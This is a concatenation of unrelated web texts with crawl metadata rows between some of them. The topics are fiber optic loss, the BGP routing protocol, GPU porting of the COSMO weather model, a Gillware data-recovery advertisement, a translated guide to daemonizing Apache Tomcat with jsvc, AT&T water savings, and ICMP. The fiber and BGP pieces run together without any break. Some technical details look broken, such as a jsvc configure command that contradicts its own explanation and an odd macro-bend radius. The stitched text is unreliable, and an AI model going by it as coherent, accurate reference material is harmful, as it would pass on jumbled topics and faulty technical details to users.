Light absorption is a major cause of fiber optic loss during optical transmission. The light is absorbed by the materials of the fiber itself, so light absorption is also known as material absorption. The light power is absorbed and converted into other forms of energy, such as heat, due to molecular resonance and wavelength impurities. The atomic structure of any material absorbs selective wavelengths of radiation, and it is impossible to manufacture materials that are totally pure. Thus, fiber optic manufacturers dope germanium and other materials into pure silica to optimize the performance of the fiber optic core.
Scattering is another major cause of fiber optic loss. It refers to the scattering of light caused by molecular-level irregularities in the glass structure. When scattering happens, the light energy is scattered in all directions. Some of it keeps traveling in the forward direction, but the light not scattered in the forward direction is lost from the fiber optic link, as shown in the following picture. Thus, to reduce fiber optic loss caused by scattering, the imperfections of the fiber optic core should be minimized, and the fiber optic coating and extrusion should be carefully controlled.
Intrinsic fiber core attenuation, including light absorption and scattering, is just one aspect of fiber optic loss. Extrinsic fiber attenuation is also very important; it is usually caused by improper handling of the fiber. There are two main types of extrinsic fiber attenuation: bend loss and splicing loss.
Bend loss is a common problem that causes fiber optic loss through improper fiber optic handling. As the name suggests, it is caused by bending the fiber. There are two basic types: micro bending and macro bending (shown in the above picture). Macro bending refers to a large bend in the fiber (with more than a 2 mm radius). To reduce fiber optic loss, bends tighter than the cable's specified minimum bend radius should be avoided during installation and handling.
Fiber optic splicing is another main cause of extrinsic fiber attenuation. It is inevitable to connect one fiber optic to another in a fiber optic network. The fiber optic loss caused by splicing cannot be avoided entirely, but it can be reduced to a minimum with proper handling. Using high-quality fiber optic connectors and fusion splicing can help reduce fiber optic loss effectively.
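Putting the intrinsic and extrinsic contributions together, installers often estimate an end-to-end loss budget for a link by summing the per-kilometer fiber attenuation with the per-connector and per-splice losses. The sketch below uses typical illustrative values (0.35 dB/km fiber, 0.3 dB per connector, 0.05 dB per fusion splice); these numbers are assumptions for the example, not figures from this article:

```python
def link_loss_budget(length_km, fiber_loss_db_per_km,
                     n_connectors, connector_loss_db,
                     n_splices, splice_loss_db):
    """Rough end-to-end loss estimate for a fiber link, in dB."""
    return (length_km * fiber_loss_db_per_km
            + n_connectors * connector_loss_db
            + n_splices * splice_loss_db)

# 10 km of fiber at 0.35 dB/km, two connectors at 0.3 dB each,
# and three fusion splices at 0.05 dB each.
total = link_loss_budget(10, 0.35, 2, 0.3, 3, 0.05)
print(round(total, 2))  # 4.25 dB
```

Comparing such an estimate against the transmitter power and receiver sensitivity shows whether a planned link has enough margin.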
The above picture shows the main causes of loss in fiber optic, which come in different types. To reduce intrinsic fiber core attenuation, selecting the proper fiber optic and optical components is necessary. To reduce extrinsic fiber attenuation to a minimum, proper handling and skills should be applied.
BGP is the Internet's routing protocol; it is what makes the Internet work.
The BGP protocol works by maintaining a table of IP networks for the biggest network in the world: the Internet. As a standardized set of rules, BGP supports core routing decisions across the Internet. Instead of using traditional IGP (Interior Gateway Protocol) metrics, BGP relies on available paths, network policies, and rule-sets to make its routing decisions, and for this reason it is sometimes described as a reachability protocol. The main idea behind BGP's creation was to replace EGP (Exterior Gateway Protocol) and permit completely decentralized routing; the NSFNET backbone is the best example of a decentralized system.
The BGP protocol enables the Internet to act as a truly decentralized network system. All BGP versions before version 4 are obsolete. The main reason for BGP version 4's consistent use is its support for classless inter-domain routing (CIDR). The protocol also uses route aggregation to reduce routing table size.
What does BGP do?
- determination of the best possible routing path
- transportation of information, in the form of packets, over the internetwork; this packet transport is relatively straightforward when compared to the complex path-determination method
The Border Gateway Protocol essentially performs best-path determination between networks. In TCP/IP networks, the role of BGP is interdomain routing. The protocol works as an exterior gateway protocol, carrying out routing between several autonomous domains and exchanging routing information among those systems. It connects almost all networks in the world into the world's biggest network, the Internet. Soon after BGP's introduction, the Exterior Gateway Protocol (EGP) became outdated: BGP resolved the serious problems attached to EGP and brought stability to the Internet's development.
BGP is described in several RFCs. RFC 1771 described BGP version 4, and RFC 1654 contained the first specification of BGP, while RFCs 1105, 1163, and 1267 specified the BGP versions that preceded version 4. Since 2006, the BGP version 4 specification has been RFC 4271.
BGP Routing Processes
BGP can perform three different types of routing, described below:
- Inter-autonomous system routing takes place between two or more BGP routers that reside in different ASs. Peering routers with BGP provides a consistent view of the internetwork topology. BGP's main function here is to supply optimal routes across the Internet through path determination.
- Intra-autonomous system routing occurs between BGP routers within the same AS and is required for a consistent view of the system topology. It is BGP's function to decide which routes should be advertised to outside ASs.
- Pass-through autonomous system routing can take place between two or more BGP routers so that network traffic can be exchanged across autonomous systems.
BGP Packet Header Layout
The BGP packet header is made up of four parts: a Marker (16 bytes in length), a Length field (2 bytes), a Type field (1 byte), and a Data field of variable length.
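As an illustration of this fixed layout, the 19-byte header can be unpacked in a few lines of Python; the field sizes and type codes below follow RFC 4271, while the sample KEEPALIVE message is constructed just for the example:

```python
import struct

BGP_HEADER_LEN = 19  # 16-byte marker + 2-byte length + 1-byte type
MESSAGE_TYPES = {1: "OPEN", 2: "UPDATE", 3: "NOTIFICATION", 4: "KEEPALIVE"}

def parse_bgp_header(data):
    """Unpack the fixed BGP message header (RFC 4271, section 4.1)."""
    marker, length, msg_type = struct.unpack("!16sHB", data[:BGP_HEADER_LEN])
    return {
        "marker": marker,      # all ones on unauthenticated sessions
        "length": length,      # total message length, header included
        "type": MESSAGE_TYPES.get(msg_type, "UNKNOWN"),
    }

# A KEEPALIVE is just the 19-byte header with type code 4.
keepalive = b"\xff" * 16 + struct.pack("!HB", 19, 4)
print(parse_bgp_header(keepalive)["type"])  # KEEPALIVE
```

Note the `!` in the format string: like most Internet protocols, BGP puts multi-byte fields on the wire in network (big-endian) byte order.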
When Piz Daint – the Cray supercomputer installed at the Swiss National Supercomputing Center (CSCS) – was first announced, the project leaders cited the benefits for COSMO, an atmospheric model used by the German Meteorological Service, MeteoSwiss and other institutions for their daily weather forecasts. The COSMO model is maintained by the Consortium for Small-scale Modeling (aka COSMO), a group of seven national weather services.
A recent article at Swiss HPC provider community hpc-ch provides an in-depth look at recent developments with the COSMO application, including how it is being modified to take advantage of hardware accelerators, like GPGPUs.
Over the past three years, researchers from the Center for Climate Systems Modeling and MeteoSwiss have been revising and refining the COSMO model’s code and the algorithms it employs as part of their work with the High Performance and High Productivity Computing (HP2C) initiative. The main goals of this project were to make the software more efficient and to adapt it to leverage the performance gains offered by hybrid GPU-based computing systems. The code was tested successfully on Piz Daint, a Cray system that derives its FLOPS from both CPUs and GPUs. In September the group reported that the simulations performed with greater efficiency and also enabled reduced energy consumption.
Because of these promising results, the Steering Committee of the COSMO Consortium has decided to fully support the new developments in the official version. This means that a GPU-friendly version will be distributed to all users of the COSMO model. Oliver Fuhrer, a senior scientist with MeteoSwiss who worked on the code changes, provides additional details about the benefits of GPU-based computing platforms and the significance of the changes.
Fuhrer notes that the integration project will prove a little challenging since the “official” model has also undergone some development work since the start of the HP2C projects – so the new version will need to incorporate both sets of changes. It’s a “strict” process that will require some code refactoring and a lot of testing, according to Fuhrer.
Fuhrer also explains that the two HP2C projects illustrated three important points:
Firstly, it is feasible to target GPU-based hardware while retaining a single source code for almost all of the COSMO code. Secondly, using GPU hardware is very attractive for accelerating simulation time and reducing the electric power required to run the computer executing the simulation. Thirdly, it is possible for domain scientists to develop and work with this new version of the COSMO model.
Even though it’s a lot of work to make the changes, the efficiency gains and power consumption benefits are a compelling case, especially given the still-expanding popularity of GPUs in big science systems. The upgraded Piz Daint supercomputer, which is coming online this November at CSCS, will use an equal number of CPUs and GPUs. “Applications that can also be run on GPUs will have unprecedented compute power available [to them],” says Fuhrer. | <urn:uuid:dfc9e8c6-f90f-4e92-bed0-5822d53dae7c> | CC-MAIN-2017-04 | https://www.hpcwire.com/2013/10/25/scientists-prepare-weather-model-gpu-based-systems/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279933.49/warc/CC-MAIN-20170116095119-00491-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.9427 | 654 | 2.703125 | 3 |
When you reformat a hard drive, it may seem like you’ve erased all of the data on it for good. The good news is that your data isn’t gone forever—it’s just become inaccessible to you. If you’ve accidentally reformatted your hard drive and lost critical data, Gillware’s accidental reformat data recovery services can reunite you with your lost files.
What Happens When You Quick Format a Hard Drive?
Every data storage device you’ve ever used has been formatted at least once. Formatting is a procedure that simply applies a filesystem to the device. Without a filesystem, whatever operating system you use on your computer would not be able to read your hard drive, USB flash drive, or solid state drive. Without a filesystem, you just have a useless hunk of metal and plastic attached to your computer.
There are many different kinds of filesystems. Windows uses NTFS, Mac uses HFS+, Linux uses a whole bunch of different file systems (like Ext3, ZFS, etc.). A USB flash drive and some older external hard drives will be formatted with FAT16 or FAT32. These file systems all seem to work the same way to the end user. But all of them function differently and have a lot of unique features. And some of them don’t play well with each other.
For example, if you plug the 4TB Western Digital My Book you use with your Macbook Pro into your Windows 10 PC, Windows will tell you the drive is blank and ask you if you want to format it! If you’re caught off-guard, you might accidentally reformat your My Book. Before you can stop it, your iPhoto library and all the documents you’ve stored on the external device will have vanished.
In other cases, if a hard drive is having trouble with its physical components or firmware, your computer may prompt you to format it. Your computer doesn’t know why it can’t communicate with the hard drive. All it knows is that the hard drive looks blank to it, and it needs to format a blank drive before it can start using it.
Formatting and reformatting a hard drive is a big deal to you and your computer. You press the “Okay” button, wait a few seconds or maybe a minute (depending on the capacity of your device), and presto, your entire hard drive is blank. But in reality, you’ve only made a small change to the drive.
At the “front end” of your hard drive (actually, the sector on the platters marked as sector 0) is a partition table. This table keeps track of how many partitions have been created on the hard drive and points to their superblocks. These superblocks, in turn, define where the partitions begin, how big they are, and where they keep their records of all the files inside their partitions.
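As an aside, the classic MBR-style partition table stored in sector 0 can be decoded in a few lines. The layout below (four 16-byte entries starting at offset 446, ending with a 0x55AA boot signature) follows the traditional MBR format; the sample partition values are invented for the example:

```python
import struct

def parse_mbr_partitions(sector0):
    """Read the four primary partition entries from an MBR boot sector."""
    assert sector0[510:512] == b"\x55\xaa", "missing MBR boot signature"
    partitions = []
    for i in range(4):
        entry = sector0[446 + 16 * i : 446 + 16 * (i + 1)]
        status, ptype, lba_start, num_sectors = struct.unpack(
            "<B3xB3xII", entry)  # skip the legacy CHS fields
        if ptype != 0:  # a type byte of 0 means the slot is unused
            partitions.append({"type": ptype,
                               "start_lba": lba_start,
                               "sectors": num_sectors})
    return partitions

# Build a toy sector 0 holding one NTFS-style partition (type 0x07).
sector0 = bytearray(512)
sector0[446:462] = struct.pack("<B3xB3xII", 0x80, 0x07, 2048, 1000000)
sector0[510:512] = b"\x55\xaa"
print(parse_mbr_partitions(bytes(sector0)))
# [{'type': 7, 'start_lba': 2048, 'sectors': 1000000}]
```

This is exactly the kind of metadata a quick format rewrites: a few dozen bytes in sector 0 that tell the operating system where each partition begins and ends.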
What exactly happens when you quick format your hard drive? The hard drive doesn’t immediately go through and start changing every binary bit on the drive to a 0. Instead, it writes over only a tiny bit of data. All your computer needs to do is change the data on the partition table and make a new superblock for the new partition. It also writes a little bit more data to the hard drive, but this data is invisible to the average user.
Let’s say you pull out your PC’s hard drive, plug it in to a different computer, and make a quick reformat. Here’s a simple “stick figure” drawing of what it might look like before you reformat it. There’s a little system partition at the beginning, then the partition containing your operating system. At the end is a partition you just put assorted files on:
Here’s what your hard drive’s geometry looks like after you quick format the drive:
There’s a new superblock defining a partition that starts near the front of the drive and spans all the way to the end. There’s also a new set of file definitions as well. There aren’t very many new files to define, though.
Some of the data was overwritten. But for the most part, the quick format operation didn’t actually do anything to the vast majority of the data on the hard drive. It just told your hard drive to ignore it and pretend the new partition is empty.
Now, if a significant amount of data is written to the hard drive after the accidental reformat, that’s a different story. This can drastically affect the results of our accidental reformat data recovery efforts. When new data is written to a hard drive, there’s no telling how much of it is going to land on top of the old data and how much will settle safely in the empty nooks and crannies around it instead. If you’ve accidentally reformatted your hard drive, the best thing you can do is stop using it as quickly as possible.
As you continue to use a hard drive that has been reformatted, new data starts to overwrite the old data.
How Do Gillware’s Accidental Reformat Data Recovery Services Work?
There are many software data recovery tools that promise to get your data back after you’ve accidentally reformatted your hard drive. These tools aren’t very robust. Some of them outright don’t work. For example, let’s go back to the first chart and say that the second partition in the old geometry starts at sector 3,000,000. In that partition’s file definitions, it identifies a Microsoft Word document that says it starts at sector 1,000.
A lazier software data recovery tool might not recognize that the file starts 1,000 sectors after the beginning of this partition (so, actually, sector 3,001,000). The tool will go back to sector 1,000 (way back in the first partition) and try to dig up a file that isn’t there.
Our data recovery experts at Gillware use our custom data recovery software, HOMBRE. HOMBRE was developed for our data recovery engineers, by our data recovery engineers. It’s a well-crafted piece of software that gives our technicians a bounty of powerful data recovery tools at their disposal.
The first thing our data recovery engineers do is make a complete, write-blocked forensic image of the reformatted hard drive. HOMBRE will scan through the entire contents of the hard drive to pick up as much metadata as it can to aid our technicians. In many accidental reformat data recovery scenarios, the old superblocks haven’t been overwritten. Or if they have, the backup superblocks are often still competely intact and can be used to uncover the hard drive’s old filesystem geometry.
In an ideal situation, the hard drive hasn’t been used at all since it was accidentally reformatted. But sometimes new data gets written to the drive. These can be inadvertently-created backup files or an entire operating system that has been newly installed to the drive. Any data written to a freshly-formatted hard drive compromises the integrity of the data on the drive. The old file definitions could point to the location of a file that has been partially or completely overwritten by new data.
HOMBRE provides our engineers with tools for this scenario, as well. Although data that has been overwritten cannot be restored, our engineers can use HOMBRE to aid in identifying file corruption and accurately determining the quality of our data recovery efforts.
Why Choose Gillware for My Accidental Reformat Data Recovery Needs?
At Gillware, we offer financially risk-free data recovery evaluations with no upfront costs. We can even provide a prepaid shipping label to cover the cost of shipping your hard drive to us. Our engineers evaluate the status of your hard drive and give you a price quote for our data recovery efforts. We only go ahead with the recovery if you are comfortable with the price quote, and don’t ask for payment until we’ve recovered your critical data.
Our data recovery technicians are world-class and have solved thousands of accidental reformat data recovery situations just like yours. Your data is in good hands at Gillware Data Recovery.
Ready to Have Gillware Assist You with Your Accidental Reformat Data Recovery Needs?
Best-in-class engineering and software development staff
Gillware employs a full time staff of electrical engineers, mechanical engineers, computer scientists and software developers to handle the most complex data recovery situations and data solutions
Strategic partnerships with leading technology companies
Gillware is proud to be a recommended provider for Dell, Western Digital and other major hardware and software vendors. These partnerships allow us to gain unique insight into recovering from these devices.
RAID Array / NAS / SAN data recovery
Using advanced engineering techniques, we can recover data from large capacity, enterprise grade storage devices such as RAID arrays, network attached storage (NAS) devices and storage area network (SAN) devices.
Virtual machine data recovery
Thanks to special engineering and programming efforts, Gillware is able to recover data from virtualized environments with a high degree of success.
SOC 2 Type II audited
Gillware has been security audited to ensure data safety, meaning all our facilities, networks, policies and practices have been independently reviewed and determined as completely secure.
Facility and staff
Gillware’s facilities meet the SOC 2 Type II audit requirements for security to prevent entry by unauthorized personnel. All staff are pre-screened, background checked and fully instructed in the security protocol of the company.
We are a GSA contract holder.
We meet the criteria to be approved for use by government agencies
GSA Contract No.: GS-35F-0547W
Our entire data recovery process can be handled to meet HIPAA requirements for encryption, transfer and protection of e-PHI.
No obligation, no up-front fees, free inbound shipping and no-cost evaluations.
Gillware’s data recovery process is 100% financially risk free. We only charge if the data you want is successfully recovered.
Our pricing is 40-50% less than our competition.
By using cutting edge engineering techniques, we are able to control costs and keep data recovery prices low.
Instant online estimates.
By providing us with some basic information about your case, we can give you an idea of how much it will cost before you proceed with the recovery.
We only charge for successful data recovery efforts.
We work with you to define clear data recovery goals for our technicians, and only charge you upon successfully meeting these goals and recovering the data that is most important to you.
Gillware is trusted, reviewed and certified
Gillware has the seal of approval from a number of different independent review organizations, including SOC 2 Type II audit status, so our customers can be sure they’re getting the best data recovery service possible.
Gillware is a proud member of IDEMA and the Apple Consultants Network. | <urn:uuid:9b9841d2-f6b7-4b38-9025-93af11abd31a> | CC-MAIN-2017-04 | https://www.gillware.com/accidental-reformat-data-recovery/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280364.67/warc/CC-MAIN-20170116095120-00399-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.917646 | 2,307 | 2.515625 | 3 |
Apache Tomcat is a web application server used widely in commercial environments, both as a standalone application platform and as the web-interface component of larger projects. In the corporate sector, the security of information systems has the highest priority, and infrastructure stability is what keeps services running without failure. Let us put the vaunted stability and security of UNIX daemons to the test, taking Tomcat as our example.
Historically, the convention has been to configure with root privileges and to work day to day without them; mixing the two earns you a rap on the knuckles. Anyone who has read even one book on *nix remembers the author's instruction by heart: do not work as root, and drop the habit of configuring the system immediately after installation, before creating at least one account with access to the wheel group. It really is a bad habit with far-reaching consequences. Looking over at the world of MS Windows, we chuckled at admins and regular users running with unlimited rights: supposed experts sitting in front of unlocked doors that lead straight to the very core of the system.
As time passes, applications grow larger, and appetites grow with them. Hardware gets more portable and sleek, yet it must hold not only these applications but also an equally varied arsenal of protection against malware and other threats. Development, implementation, and operation have become an industry, and an extremely profitable one. It is hard to imagine an enterprise that gets by without commercial offerings, and those offerings keep getting more complicated, more reliable, and smarter. Whole niches of corporate development have emerged, and it has become incredibly difficult to do without them. Try, for example, giving up remote access to corporate mail, or leaving at home the laptop with that convenient calendar and a tunnel to your work files.
Probably the most popular product of the Apache community is httpd; until version 2 it was simply called apache. These days, a web server quietly working in the background and handling thousands of parallel sessions is mentioned only academically, kept for backward compatibility, or simply out of nostalgia. The Apache community keeps living and demonstrating ever new technologies, applications, and solutions to the world. It is one of these wonders we are going to deal with now.
Find yourself a cat
Java developers know the Tomcat server well, and proficiency with it has become a requirement for many positions. An admin who knows this server can land a fairly good position and earn their bread and butter without much effort. Developers of very large software systems keep the cat, too: sometimes those systems work hard for many thousands (and maybe even millions) of people while the cat silently provides the management web interface. In short, cats are useful animals.
But has everyone looked into the cat's environment? How many of us ever pay attention to where it is allowed to roam, what food is left within its reach, and whether the noble animal is free to knock over every flowerpot in the house?
Metaphors aside, let us study the privileges assigned to our servlet container. I have rarely seen anything more elaborate than starting the server via /bin/su tomcat $CATALINA_HOME/bin/startup.sh. Yes, a tomcat user has been created; yes, the directory has been assigned to that owner. But is this really everything the Linux/UNIX world can provide us? Hardly. Consider the special case of startup where a process, and hence all its children and threads, is started with root privileges. What are the dangers here? Here is the list:
- A hypothetical intruder can exploit any vulnerability in a library, class, or application code. With root privileges, trouble is inevitable.
- The same risk applies to the server's own code, libraries, and classes, as a glance through any release changelog will confirm.
- A bug in code or in an algorithm can prove very expensive when it executes with root privileges.
- An error in the application design can block a shared resource.
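Before changing anything, it is worth seeing what the exposure looks like on your own machine. The sketch below is an assumption-laden illustration, not part of the original setup: it assumes a Linux box with a procps-style ps, and simply lists process owners so that a root-owned application server stands out.

```shell
# List the owner, PID, PPID and command of running processes.
# The awk filter keeps the header line plus any java/tomcat entries;
# if no such process is running, only the header is printed.
ps -eo user,pid,ppid,comm | awk 'NR==1 || /java|tomcat/'
```

A root in the first column next to a java process means every servlet effectively runs with full system rights, which is exactly the danger listed above.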
People make mistakes, and we are going to contain those mistakes using the mechanisms that lay the foundation of modern multi-user operating systems. We will begin with what it means to isolate a server process and turn it into a real daemon.
How does it function?
The potential dangers of starting a daemon with root privileges have been on our minds since the days of the above-mentioned httpd: unauthorized access to files (especially with Perl) and traversal a level or two above DocumentRoot, with SQL injection being a separate branch of science, complete with its own professors. And now, two questions and two answers:
- Which way did the developers of httpd, MySQL, PostgreSQL, and other products choose? The answer: they dropped root privileges from the processes listed above.
- What should be done when we really do need those privileges for system calls and direct access to the kernel and its resources, if only to open a privileged port? The answer: several mechanisms exist, for example the notorious SUID bit, or dropping privileges programmatically after startup.
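Of the mechanisms just mentioned, the SUID bit is the easiest to see with your own eyes: setting it replaces the owner's execute flag with an s in a listing, telling the kernel to run the file with its owner's UID. A harmless illustration on a throwaway file (no root required; this is my own demo, not from the original article):

```shell
# Create a scratch file, set the SUID bit (the leading 4 in the mode),
# and observe the 's' in the owner-execute position of the listing.
f=$(mktemp)
chmod 4755 "$f"
ls -l "$f" | cut -c1-10    # prints: -rwsr-xr-x
rm -f "$f"
```

That single s is what lets programs like passwd do privileged work on behalf of ordinary users, and it is also why stray SUID binaries are a favorite target of intruders.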
Let’s have a look at the process status display (Fig. 1).
These are the processes in the running state. The ‘master’ process has spawned five workers, made them run as the system user ‘nobody’, detached them from the terminal by redirecting output to a log, and opened a port for them (port 80 by default). With this, we can be sure that the directory the process runs in is not the root directory (/), and that no one will be able to log in as the user ‘nobody’. You can see that the basics of isolation in the system are met.
Now we examine a modified output (Fig. 2).
How do we know these are child processes? By their PPID. Everything is in compliance with the rules: the master process has PPID 1, so it was clearly started by init, while all the others have a PPID equal to the master's PID.
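The same parent/child bookkeeping can be reproduced with any process. The snippet below (my own experiment, assuming a standard Linux ps) spawns a child from the current shell and confirms via ps that the child's PPID equals the shell's own PID, just as Tomcat's workers point back to their master:

```shell
# Spawn a child, then ask ps for its parent PID; it must equal our own PID ($$).
sleep 30 &
child=$!
parent=$(ps -o ppid= -p "$child" | tr -d ' ')
echo "my PID: $$, child: $child, child's PPID: $parent"
[ "$parent" = "$$" ] && echo "child points back to its master"
kill "$child"
```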
Most daemons do more than create child processes: they also distribute load across them, hand their logs to the syslogd daemon, and perform other useful work. In general, we can send a daemon any signal, just as we can any other process, e.g. SIGHUP, usually wired to reload in the init script. This is useful under heavy load, when fully restarting the process to apply a new config file would take too long and interrupt many sessions. We can also pause a process with SIGSTOP and then let it continue with SIGCONT.
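Before sending signals to a production daemon, you can rehearse on a harmless stand-in; this small demo (my addition, assuming Linux ps state codes) parks a process with SIGSTOP and wakes it with SIGCONT:

```shell
# Freeze and resume a background process with the same signals
# you would send to a daemon's master process.
sleep 60 &
pid=$!
kill -STOP "$pid"
echo "after SIGSTOP: state=$(ps -o stat= -p "$pid" | tr -d ' ')"   # T = stopped
kill -CONT "$pid"
sleep 1
echo "after SIGCONT: state=$(ps -o stat= -p "$pid" | tr -d ' ')"   # S = sleeping again
kill "$pid"
```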
Working with commercial applications, I have noticed that even large, industry-leading companies pay no attention to privilege reduction and leave Tomcat owned by root. Let us discuss how to eliminate these problems.
Let me introduce — jsvc
The Apache Commons project has developed the jsvc utility, whose source code is shipped with the Tomcat distribution. Its purpose is to perform the series of actions that turn Tomcat into a proper UNIX daemon. Jsvc can change the UID of the child process via fork(), put the parent process to sleep, separate the standard output and error streams, accept standard Java options and JVM options, process code and system assertions, and do many other things; the full list is available from the utility's help output.
To get the full experience, we will build the project manually, although, for example, the CentOS base repository carries a (not quite current) implementation under the code name jakarta-commons-daemon-jsvc, described as a Java daemon launcher. Now, to the point. We will need make and GCC. Change into $CATALINA_HOME/bin/, unpack the commons-daemon-native.tar.gz archive, and enter the unix directory:
$ tar xzvf commons-daemon-native.tar.gz ; cd commons-daemon-1.0.10-native-src/unix/
The installation docs say that a simple chain of ./configure ; make ; cp jsvc ../.. ; cd ../.. is sufficient to build it, but I would like to supplement that information with my own findings from a thorough study of the ./configure file. The information is useful, and Gentoo professionals will appreciate it.
First, when building, make sure to specify JAVA_HOME, the path to the directory containing the JDK. As far as I could tell, this option fixes the path to Java statically: when you build for a specific server, the path is taken from a constant in the code instead of an environment variable. Second, it is desirable to specify -with-os-type=linux; this option hardly needs describing, since its meaning is literal. The value is the name of the directory JAVA_HOME/include/<OS_for_which_JDK_was_built>, which during compilation makes it possible to avoid the Sun-specific data types. Third, the GCC options CFLAGS=-m64 LDFLAGS=-m64: with these I noticed the executable file came out roughly half the size. Be careful: these flags produce 64-bit machine instructions, so the software will not start on a 32-bit machine.
All in all, my configuration string looked as follows:
./configure -with-java=/usr/java/latest -with-os-type=/include/linux CFLAGS=-m64 LDFLAGS=-m64
If you are interested in tuning the build for a specific processor, the Gentoo wiki is at your service; to me, though, the performance gain did not seem significant, given modern hardware.
One bug deserves special mention: I caught it when building, on CentOS 5, the version delivered with Tomcat 6. If you do not run make clean before make, the build chokes on libservice.a. As far as I know, the 'Malformed archive' error comes from an older version of the ar archiver; with version 2.20, the archive is modified successfully.
The output is a small executable file that will daemonize our Thomas (Tomcat). We move it to the bin directory and prepare a script to start and initialize it. In release 7.x, everything turned out to be very easy: Java options are passed via the setenv.sh file, which you simply create and fill with those options (JAVA_OPTS=”-Xmx2G -Xms1G …”). In the same bin directory there is a daemon.sh file; open it and set the TOMCAT_USER variable to the name of the user who will own the process, e.g. ‘daemon’. What is important: this user must already exist in the system, and its shell must be /sbin/nologin, the same as for all the special users created to own background processes. Then we make a symbolic link to this file:
$ ll /etc/init.d/tomcatd
lrwxrwxrwx 1 root root 30 Jun 26 13:38 /etc/init.d/tomcatd -> /opt/tomcatd/bin/daemon.sh
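For completeness, here is what creating the setenv.sh mentioned above might look like. The path and memory values are illustrative assumptions; the sketch defaults to a temporary directory so it can be run safely anywhere, but on a real server you would point CATALINA_HOME at your actual installation:

```shell
# Write a minimal setenv.sh with JVM options; Tomcat 7's startup scripts
# source this file automatically if it exists in $CATALINA_HOME/bin.
CATALINA_HOME=${CATALINA_HOME:-$(mktemp -d)}   # assumption: your real install path
mkdir -p "$CATALINA_HOME/bin"
cat > "$CATALINA_HOME/bin/setenv.sh" <<'EOF'
JAVA_OPTS="-Xmx2G -Xms1G"
EOF
cat "$CATALINA_HOME/bin/setenv.sh"
```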
We used CentOS for validation; therefore, for chkconfig to work correctly with the initialization script, the run levels and the start and stop priorities must be declared at the beginning of the script:
$ head /etc/init.d/tomcatd
# chkconfig: 345 73 21
# description: Tomcat super daemon
Let’s try to start it (Fig. 3).
There is always a chance of deviation from plan. The server startup log is written to catalina-daemon.out and, as mentioned, errors are written to a separate file, catalina-daemon.err.
The process list shows a parent process with root privileges and a child one owned by daemon. The default shell for this user is /sbin/nologin, so there is no way to execute anything without direct access to the OS kernel through system calls.
$ su daemon
This account is currently not available.
In the end, we have obtained a full-featured Java application server, launched according to the UNIX concept with privileges that are required and sufficient. In the general case, the server follows this scenario:
- It loads into memory and calls fork(), changing the owner of the child process.
- The parent waits for the child to respond with something like ‘I’m ready’, and then blocks in wait_child(), a classic of the genre.
- The child process is a master like the one we saw earlier. It is this process that starts the Java machine, applies the options to it, and performs everything Tomcat’s operating logic provides; it then spawns threads and accepts client connections.
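The scenario above can be re-enacted in miniature with plain shell. This is my own toy sketch: the privilege change itself needs root and is therefore left as a comment, but the fork-then-wait structure is the same one jsvc uses.

```shell
# "Parent" launches a "child" worker in the background (the shell's stand-in
# for fork()) and blocks in wait until the child reports ready and exits.
worker() {
  # jsvc would call setuid()/setgid() here to shed root; demoing that needs root.
  echo "child: running as UID $(id -u), ready"
}
worker &
child=$!
echo "parent: waiting on child PID $child"
wait "$child"
echo "parent: child exited with status $?"
```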
Collaborating with Environmental Defense Fund to Shrink Our Water Footprint
By: John Schulz, Director, AT&T Sustainability Operations
Compared to other resources, water is relatively cheap, which is ironic considering that we literally can't live without it. It is a critical natural resource to ecological health, community vitality and business operations. As demand for water grows - 40 percent by 2030 by some estimates - and climate change impacts water availability, the financial cost of water will surely change. In the meantime, AT&T is working diligently to insulate our operations from increasing water scarcity and rising water costs. We're focused on reducing our water use today.
We are taking a comprehensive approach to reducing our 3.3 billion gallon water footprint by following a few basic guidelines.
- Think differently about the business case: Because water is so inexpensive today, it is difficult to build a compelling business case for water-efficiency investment. Our challenge is to identify ways to broaden the business case conversation to make it more financially compelling. The connection between water and electricity is fundamental to that thinking.
- Think locally: We evaluated regional differences in order to prioritize action, because compared to other resources and commodities, water is particularly shaped by region. We used tools like the World Business Council for Sustainable Development's Water Tool and others to calculate water scarcity risk at our various facilities. Not only are water-stressed areas in the greatest need, but they also tend to be the most likely to have higher water prices, incentives or pending regulations, all of which impact the business case.
- Think about the big picture: We evaluated how we use water, including some of the "hidden" places it is used. For us, observable water uses such as in bathrooms and landscape irrigation are a smaller percentage of our water use and are relatively expensive to upgrade, making it a more difficult business case. In fact, we found that we would make a more compelling water-efficiency business case by focusing on the water that is intertwined with our energy usage in the building cooling process.
To that end, May 2012 saw the start of collaboration between Environmental Defense Fund (EDF) and AT&T focused on reducing the amount of water used to keep large buildings cool. Cooling towers, which are often used to help chill large buildings, require large volumes of water - 25 percent of an office building's daily water use on average, but higher in buildings like data centers that have more heat-producing pieces of equipment than people. Together with EDF, we ran a series of pilots across the United States in 2012 to test ways to reduce water used in the cooling process through operational improvements, technical upgrades or switching to free air cooling. In some cases, the pilots didn't produce the results we had expected, but some results were very promising.
During this process, we've learned about the realities of rolling out a water management program and have developed several tools and resources that we've found useful. The fact is that the reduction potential that we've identified is a substantial savings when scaled across AT&T, but it could be a tremendous savings if achieved more broadly. That's why we're making our tools available to all organizations that could benefit from them. Over the course of 2013, EDF and AT&T will be distributing and promoting these tools to those building owners who have the opportunity to reduce water usage and costs. Visit www.edf.org/attwater to find tools that organizations can use to measure and manage their own water use. | <urn:uuid:0bbb486b-b0b1-463a-ab98-5e218e126d66> | CC-MAIN-2017-04 | https://www.att.com/gen/landing-pages?pid=24188 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281001.53/warc/CC-MAIN-20170116095121-00215-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.966229 | 712 | 2.796875 | 3 |
Transmission Control Protocol/Internet Protocol (TCP/IP) is the acronym identifying a suite, or stack, of protocols developed by the U.S. Department of Defense in the 1970s to support the construction of worldwide internetworks. TCP and IP are the two best-known protocols in the suite.
The TCP/IP stack also includes the Internet Control Message Protocol (ICMP), which is designed to help an administrator manage and control the operation of a TCP/IP network. Every now and then a gateway device, such as a router, or possibly the destination host, will communicate with a source host to report an error in datagram processing. ICMP carries these reports, which makes it a valuable tool in the troubleshooting process.
ICMP is sometimes called an umbrella protocol because it contains many sub-protocols and provides a wide variety of information about a network’s health and operational status. Unique ICMP messages are sent in several situations such as:
- when a datagram cannot reach its destination
- when the gateway does not have the buffering capacity to store and then forward a datagram
- when the gateway can redirect the host to send traffic through a more optimal route
